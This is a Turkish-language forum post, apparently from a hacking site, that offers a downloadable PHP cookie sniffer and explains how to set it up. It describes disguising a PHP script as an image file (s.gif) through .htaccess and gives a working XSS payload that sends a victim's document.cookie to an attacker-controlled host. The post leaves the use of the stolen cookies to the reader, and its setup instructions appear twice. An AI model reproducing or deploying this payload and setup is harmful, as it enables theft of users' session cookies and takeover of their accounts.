Php ile yapılmış bir cookie sniffer türüdür , xss ile hedeflerden cookie (çerez) toplamanızı sağlar , tabi bu çerezleri nasıl kullanacağınız size kalmış bir kısımdır.
Kullanımı
indirdiğiniz dosyanın içindekileri php destekli bir sitenize klasör açarak yüklüyorsunuz mesala www.spyhackerz.com/sniffer/ gibi.
Yüklediğiniz dosyalar içinde s.gif diye bir imaj dosyası göreceksiniz , bu aslında bir imaj dosyası değil yani bu bir php dosyası görevi görmekte , sadece uzantısı .gif olup .htaccess ile php görevi görmesi sağlanmakta.
bu kısma dikkat edin .htaccess ile php gibi çalışması sağlanır , yani sunucunuzunda bu manipilasyona izin vermesi gerekiyor.
Bunda sonrası ise artık xss kodlarınızda s.gif i çalıştırmak
örnek çalıştırma tekniği
DOWNLOAD
Kullanımı
indirdiğiniz dosyanın içindekileri php destekli bir sitenize klasör açarak yüklüyorsunuz mesala www.spyhackerz.com/sniffer/ gibi.
Yüklediğiniz dosyalar içinde s.gif diye bir imaj dosyası göreceksiniz , bu aslında bir imaj dosyası değil yani bu bir php dosyası görevi görmekte , sadece uzantısı .gif olup .htaccess ile php görevi görmesi sağlanmakta.
bu kısma dikkat edin .htaccess ile php gibi çalışması sağlanır , yani sunucunuzunda bu manipilasyona izin vermesi gerekiyor.
Bunda sonrası ise artık xss kodlarınızda s.gif i çalıştırmak
örnek çalıştırma tekniği
Code:
<script> img = new Image(); img.src = "http://yourhost.com/s.gif?"+document.cookie; </script>DOWNLOAD
